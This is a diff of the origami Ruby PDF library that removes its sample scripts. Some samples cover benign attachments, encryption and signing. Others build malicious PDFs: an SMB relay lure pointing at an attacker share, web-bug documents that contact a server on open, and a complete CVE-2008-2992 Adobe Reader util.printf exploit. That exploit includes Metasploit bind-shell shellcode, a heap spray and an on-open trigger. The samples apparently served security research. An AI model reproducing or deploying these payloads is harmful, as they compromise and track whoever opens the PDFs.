origami 1.2.7 → 2.0.0

data/samples/actions/samba/smbrelay.rb

@@ -1,26 +0,0 @@
-#!/usr/bin/ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-#
-# SMB relay attack.
-# Uses a GoToR action to open a shared network directory.
-#
-
-ATTACKER_SERVER = "localhost"
-
-pdf = PDF.read(ARGV[0])
-
-dst = ExternalFile.new("\\\\#{ATTACKER_SERVER}\\origami\\owned.pdf")
-gotor = Action::GoToR[dst, Destination::GlobalFit.new(0), true]
-pdf.pages.first.onOpen(gotor)
-
-pdf.save("#{File.basename($0, '.rb')}.pdf")
-

data/samples/actions/webbug/submitform.js

@@ -1,26 +0,0 @@
-try
-{
-
-  app.alert("First, I try to launch your browser :)");
-  app.launchURL("http://localhost/webbug-browser.html");
-  
-}
-catch(e)
-{
-}
-
-try
-{
-  app.alert("Now I try to connect to the website, through your Reader");
-
-  this.submitForm( 
-  { 
-    cURL: "http://localhost/webbug-reader.php",
-    bAnnotations: true,
-    bGet: true,
-    cSubmitAs: "XML"
-  });
-}
-catch(e)
-{
-}

data/samples/actions/webbug/webbug-browser.rb

@@ -1,68 +0,0 @@
-#!/usr/bin/ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-OUTPUTFILE = "webbug-browser.pdf"
-
-puts "Now generating a new bugged PDF file from scratch!"
-
-URL = "http://localhost/webbug-browser.html"
-
-pdf = PDF.new
-
-contents = ContentStream.new
-contents.write "webbug-browser.pdf",
-  :x => 270, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
-
-contents.write "When opened, this PDF connects to \"home\"",
-  :x => 156, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
-
-contents.write "Click \"Allow\":",
-  :x => 156, :y => 670, :size => 12
-
-contents.write "  1. Starts your default browser",
-  :x => 156, :y => 650, :size => 12 
-
-contents.write "  1. Connects to #{URL}",
-  :x => 156, :y => 630, :size => 12
-
-contents.write "Comments:",
-  :x => 75, :y => 580, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
-
-content = <<-EOS
-Windows:
-  - Foxit : opens the default browser without any user confirmation (!)
-  - Acrobat Reader 8: a pop-up spreads asking if it can connect, then Internet Explorer is connected.
-
-
-Mac:
-  - Preview: nothing happens
-  - Acrobat Reader 8: a pop-up spreads asking if it can connect, then Safari is connected
-
-Linux:
-  - poppler: nothing happens
-  - Acrobat Reader [7, 8]: a pop-up spreads asking if it can connect
-
-
-EOS
-
-contents.write content,
-  :x => 75, :y => 560, :rendering => Text::Rendering::FILL
-
-
-page = Page.new.setContents( contents )
-pdf.append_page(page)
-
-# Starting action
-pdf.onDocumentOpen Action::URI[URL]
-
-pdf.save(OUTPUTFILE)
-
-puts "PDF file saved as #{OUTPUTFILE}."

data/samples/actions/webbug/webbug-js.rb

@@ -1,67 +0,0 @@
-#!/usr/bin/ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-OUTPUTFILE = "webbug-js.pdf"
-JSCRIPTFILE = "submitform.js"
-
-puts "Now generating a new PDF file from scratch!"
-
-contents = ContentStream.new.setFilter(:FlateDecode)
-contents.write OUTPUTFILE,
-  :x => 300, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
-
-contents.write "This PDF tries to connect through JavaScript calls :-D",
-  :x => 186, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
-
-contents.write "The script first tries to run your browser, then it connects with the Reader.",
-  :x => 186, :y => 670, :size => 15
-
-contents.write "Comments:",
-  :x => 75, :y => 620, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
-
-content = <<-EOS
-Windows:
-  - Acrobat Reader 8: Same behavior as with webbug-browser.pdf and webbug-reader.pdf.
-  - Foxit: Same behavior as with webbug-browser.pdf and webbug-reader.pdf, at the difference a popup appears
-      to ask for user confirmation before launching the browser. However the reader still connects to the site without
-      confirmation, as with webbug-reader.pdf
-
-Mac:
-
-Linux:
-  - Acrobat Reader 8: same behavior as Windows version.
-  - poppler-based viewers: not interpreting JavaScript : nothing happens.
-  
-EOS
-
-contents.write content,
-  :x => 75, :y => 600, :rendering => Text::Rendering::FILL
-
-# A JS script to execute at the opening of the document 
-jscript = File.open(JSCRIPTFILE).read
-
-pdf = PDF.new
-
-page = Page.new
-page.Contents = contents
-
-pdf.append_page(page)
-
-# Create a new action based on the script, compressed with zlib
-jsaction = Action::JavaScript Stream.new(jscript,:Filter => :FlateDecode) 
-
-# Add the script into the document names dictionary. Any scripts registered here will be executed at the document opening (with no OpenAction implied).
-pdf.register(Names::Root::JAVASCRIPT, "Update", jsaction)
-
-# Save the resulting file
-pdf.save(OUTPUTFILE)
-
-puts "PDF file saved as #{OUTPUTFILE}."

data/samples/actions/webbug/webbug-reader.rb

@@ -1,90 +0,0 @@
-#!/usr/bin/ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-OUTPUTFILE = "webbug-reader.pdf"
-
-URL = "http://localhost/webbug-reader.php"
-
-puts "Now generating a new bugged PDF file from scratch!"
-
-pdf = PDF.new
-
-contents = ContentStream.new
-contents.write "webbug-reader.pdf",
-  :x => 270, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
-
-contents.write "When opened, this PDF connects to \"home\"",
-  :x => 156, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
-
-contents.write "Click \"Allow\" to connect to #{URL} through your current Reader.",
-  :x => 156, :y => 670, :size => 12
-
-
-contents.write "Comments:",
-  :x => 75, :y => 600, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
-
-
-content = <<-EOS
-1. Open this pdf document (webbug-reader.pdf)
-2. The Reader connects to ${url}
-3. The web server returns the requested page:
-      <?php
-        header('Content-type: application/pdf');
-        readfile('calc.pdf');
-      ?>
-4. The Reader receives \"calc.pdf\" which is immediatly rendered
-5. A pop-up ask if it can execute the calc...
-
-Note: The URL where the Reader tries to connect is displayed
-
-
-
-Windows:
-  - Foxit : Nothing happens.
-  - Acrobat Reader 8: a popup appears for the user to allow the connection,
-      then the connection is made and a new window is opened with the 2nd document
-
-Mac:
-  - Preview: nothing happens
-  - Acrobat Reader 8: a popup appears for the user to allow the connection,
-      then the connection is made and a new window is opened with the 2nd document
-
-Linux:
-  - poppler: /SubmitForm is not supported
-  - Acrobat Reader 8: a popup appears for the user to allow the connection,
-      then the connection is made and a the document window is replaced with the 2nd document
-      Note: The 2 documents can be seen in the\"Window\" menu.
-  - Acrobat Reader 8: a popup appears for the user to allow the connection,
-      then the connection is made and a new window is opened with the 2nd document
-
-
-EOS
-
-contents.write content,
-  :x => 75, :y => 580, :rendering => Text::Rendering::FILL, :size => 12
-
-page = Page.new.setContents( contents )
-pdf.append_page( page )
-
-# Submit flags.
-flags = Action::SubmitForm::Flags::EXPORTFORMAT|Action::SubmitForm::Flags::GETMETHOD
-
-# Sends the form at the document opening.
-pdf.onDocumentOpen Action::SubmitForm[URL, [], flags]
-
-# Comments:
-#  - any port can be specified http://url:1234
-#  - does not follow the Redirect answers
-
-# Save the resulting file.
-pdf.save(OUTPUTFILE)
-
-puts "PDF file saved as #{OUTPUTFILE}."

data/samples/attachments/attach.rb

@@ -1,40 +0,0 @@
-#!/usr/bin/env ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-INPUTFILE = "attached.txt"
-OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
-
-puts "Now generating a new PDF file from scratch!"
-
-# Creating a new file
-pdf = PDF.new
-
-# Embedding the file into the PDF.
-pdf.attach_file(INPUTFILE, 
-  :EmbeddedName => "README.txt", 
-  :Filter => :ASCIIHexDecode
-)
-
-contents = ContentStream.new
-contents.write "File attachment sample",
-  :x => 250, :y => 750, :rendering => Text::Rendering::FILL, :size => 30
-
-pdf.append_page Page.new.setContents(contents)
-
-pdf.onDocumentOpen Action::JavaScript <<JS
-  this.exportDataObject({cName:"README.txt", nLaunch:2});
-JS
-
-
-pdf.save(OUTPUTFILE)
-
-puts "PDF file saved as #{OUTPUTFILE}."
-

data/samples/attachments/attached.txt

@@ -1 +0,0 @@
-***THIS IS THE EMBEDDED FILE***

data/samples/crypto/crypto.rb

@@ -1,28 +0,0 @@
-#!/usr/bin/env ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
-
-puts "Now generating a new PDF file from scratch!"
-
-# Creates an encrypted document with AES256 and a null password.
-pdf = PDF.new.encrypt(:cipher => 'aes', :key_size => 256)
-
-contents = ContentStream.new
-contents.write "Crypto sample",
-  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
-
-pdf.append_page Page.new.setContents(contents)
-
-pdf.save(OUTPUTFILE)
-
-puts "PDF file saved as #{OUTPUTFILE}."
-

data/samples/digsig/signed.rb

@@ -1,46 +0,0 @@
-#!/usr/bin/ruby 
-
-require 'openssl'
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
-CERTFILE = "test.crt"
-RSAKEYFILE = "test.key"
-
-contents = ContentStream.new.setFilter(:FlateDecode)
-contents.write OUTPUTFILE,
-  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
-
-pdf = PDF.new
-page = Page.new.setContents(contents)
-pdf.append_page(page)
-
-# Open certificate files
-cert = OpenSSL::X509::Certificate.new(File.open(CERTFILE).read)
-key = OpenSSL::PKey::RSA.new(File.open(RSAKEYFILE).read)
-
-sigannot = Annotation::Widget::Signature.new
-sigannot.Rect = Rectangle[:llx => 89.0, :lly => 386.0, :urx => 190.0, :ury => 353.0]
-
-page.add_annot(sigannot)
-
-# Sign the PDF with the specified keys
-pdf.sign(cert, key, 
-  :method => 'adbe.pkcs7.sha1',
-  :annotation => sigannot, 
-  :location => "France", 
-  :contact => "fred@security-labs.org", 
-  :reason => "Proof of Concept"
-)
-
-# Save the resulting file
-pdf.save(OUTPUTFILE)
-

data/samples/exploits/cve-2008-2992-utilprintf.rb

@@ -1,87 +0,0 @@
-#!/usr/bin/env ruby 
-
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-
-pdf = PDF.read(ARGV[0])
-
-# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
-win32_bin = "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350"
-
-
-# linux/x86/shell_bind_tcp - 105 bytes
-# http://www.metasploit.com
-# Encoder: x86/shikata_ga_nai
-# AppendExit=false, PrependSetresuid=false, 
-# PrependSetuid=false, LPORT=4444, RHOST=, 
-# PrependSetreuid=false
-linux_bin = "%u7dbf%uca55%u2ba7%udbc9%ub1d3%ud914%u2474%u5bf4%ueb83%u31fc%u0e7b%u7b03%u9f0e%ufba0%ua87c%uafa8%u05c1%u5245%u484f%u3429%u0a82%ue711%u624e%u1559%u2e7e%u0acf%u9ed1%uca86%u78bb%uc1c1%u0dbc%uddb0%u090f%ub883%u91a2%uf4a0%u5c5b%u66a6%u34fa%ud098%u4830%u99af%u2032%u751f%ud8b0%ua637%u7154%u31a6%ud17b%ucb65%u619d%u0682%u41dd"
-
-shellcode = linux_bin
-
-jscript = %Q|
-/*
-From: http://www.milw0rm.com/exploits/7006
-
-Adobe Reader Javascript Printf Buffer Overflow Exploit
-===========================================================
-Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
-CVE-2008-2992
-
-Thanks to coresecurity for the technical background. 
-
-6Nov,2008: Exploit released by me 
-
-Credits: Debasis Mohanty
-www.hackingspirits.com
-www.coffeeandsecurity.com
-===========================================================
-
-//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
-//www.coffeeandsecurity
-//www.hackingspirits.com
-*/
-
-    app.alert("Prepare the spray");
-
-    var shellcode = unescape("#{shellcode}");
-
-    //Heap Spray starts here - Kiddos dont mess up with this
-    var nop ="";
-    for (i = 128;i >= 0; --i) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
-    heapblock = nop + shellcode;
-
-    bigblock = unescape("%u9090%u9090");
-    headersize = 20;
-    spray = headersize+heapblock.length
-    while (bigblock.length<spray) bigblock+=bigblock;
-
-    fillblock = bigblock.substring(0, spray);
-    block = bigblock.substring(0, bigblock.length-spray);
-
-    while(block.length+spray < 0x40000) block = block+block+fillblock;
-
-    mem = new Array();
-    for (i=0;i<1400;i++) mem[i] = block + heapblock;
-
-    app.alert("Pull the trigger");
-
-// reference snippet from core security
-// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
-
-var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
-util.printf("%45000f",num);
-//    util.printf("%45000.45000f", 0);
-
-|
-
-exploit = Action::JavaScript Stream.new(jscript)
-pdf.onDocumentOpen( exploit )
-pdf.save("#{File.basename($0, '.rb')}.pdf")
-